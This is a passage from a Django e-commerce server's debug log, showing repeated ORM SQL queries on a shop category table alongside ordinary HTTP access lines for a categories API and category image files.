(0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:06:35,256 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:06:35,260 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:06:35,264 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:06:35,270 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:06:35,274 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:06:35,278 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:06:35,282 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:06:35,286 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:06:35,292 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:06:35,296 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:06:35,300 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:06:35,304 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:06:35,308 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:06:35,312 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:06:35,317 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:06:35,321 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:06:35,325 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:06:35,329 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:06:35,333 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:06:35,339 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:06:35,342 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:06:35,346 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:06:35,350 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:06:35,354 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:06:35,361 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:06:35,365 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:06:35,368 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:06:35,372 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:06:35,376 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:06:35,380 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:06:35,385 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:06:35,389 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:06:35,393 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:06:35,397 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:06:35,401 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:06:35] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [20/Dec/2019 06:06:36] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [20/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:12:22,825 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:12:22,843 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:12:22,851 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:12:22,856 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:12:22,862 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:12:22,866 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:12:22,871 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:12:22,875 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:12:22,879 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:12:22,886 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:12:22,896 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:12:22,901 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:12:22,905 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:12:22,909 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:12:22,915 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 19; args=(19,) DEBUG 2019-12-20 06:12:22,921 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:12:22,925 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:12:22,926 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:12:22,931 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) [20/Dec/2019 06:12:22] "GET /api/v1/categories/19 HTTP/1.0" 200 217 DEBUG 2019-12-20 06:12:22,936 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:12:22,940 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:12:22,949 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:12:22,953 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:12:22,959 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:12:22,963 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:12:22,968 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:12:22,972 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:12:22,979 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:12:22,983 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, 